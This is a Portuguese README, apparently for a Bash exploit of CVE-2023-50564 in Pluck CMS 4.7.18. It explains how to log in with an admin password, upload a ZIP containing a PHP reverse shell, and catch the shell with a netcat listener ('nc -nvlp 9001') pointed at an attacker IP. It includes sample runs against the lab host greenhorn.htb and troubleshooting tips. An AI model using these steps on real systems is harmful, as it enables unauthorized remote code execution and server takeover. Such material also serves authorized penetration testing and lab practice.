
Exploit em Bash que automatiza a execução remota de código autenticada no Pluck CMS 4.7.18 por meio de upload de ZIP malicioso, acionando um reverse shell em PHP para o CVE-2023-50564.
Este script explora uma vulnerabilidade de Execução Remota de Código (RCE) no Pluck CMS v4.7.18. A vulnerabilidade permite que um usuário malicioso carregue um arquivo PHP malicioso no servidor e o execute, obtendo execução remota de comandos na máquina alvo.
O script automatiza todo o processo:
Nota: O script requer um listener Netcat na máquina do atacante para receber o reverse shell.
Antes de executar o script, certifique-se de que:
./CVE-2023-50564 -h <host> -P <senha> -i <IP> -p <porta>
-h <host>: O host alvo (ex: greenhorn.htb).-P <senha>: A senha do painel de administração do Pluck CMS (ex: abcd123).-i <IP>: O endereço IP do atacante para receber o reverse shell.-p <porta>: A porta na qual o listener Netcat está rodando para capturar o reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Configurar o listener Netcat: Na máquina do atacante, inicie um listener Netcat na porta especificada:
nc -nvlp <porta>
Por exemplo:
nc -nvlp 9001
Executar o script: Forneça os parâmetros necessários ao script, incluindo host, senha, endereço IP e porta.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Execução do Script:
love.php)."RCE is waiting for you, please go take a look.", e o script será encerrado após rastrear o tempo gasto.Acessar o Alvo: Assim que o reverse shell for acionado, a conexão aparecerá no seu listener Netcat, fornecendo acesso remoto à máquina alvo.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Você pode instalar curl e netcat usando os seguintes comandos, se não estiverem instalados:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Este script é destinado apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado deste script é ilegal e antiético. Sempre obtenha a devida autorização antes de explorar qualquer vulnerabilidade em um sistema.
504 Gateway Time-out: O script pode encontrar esse erro ao tentar executar o reverse shell, mas isso não afeta o sucesso da execução do shell. O erro geralmente ocorre porque o servidor alvo demora muito para responder à solicitação HTTP, mas o shell ainda deve funcionar.
Problemas com o Listener Netcat: Se você não receber o reverse shell, verifique se o endereço IP e a porta estão configurados corretamente e se não há restrições de firewall impedindo o alvo de se conectar de volta à sua máquina.
Falha no Login do Script: Se o login no painel de administração do CMS falhar, verifique a senha fornecida e certifique-se de que o CMS está acessível na máquina alvo.
Deixe-me saber se precisar de mais personalizações ou esclarecimentos no README!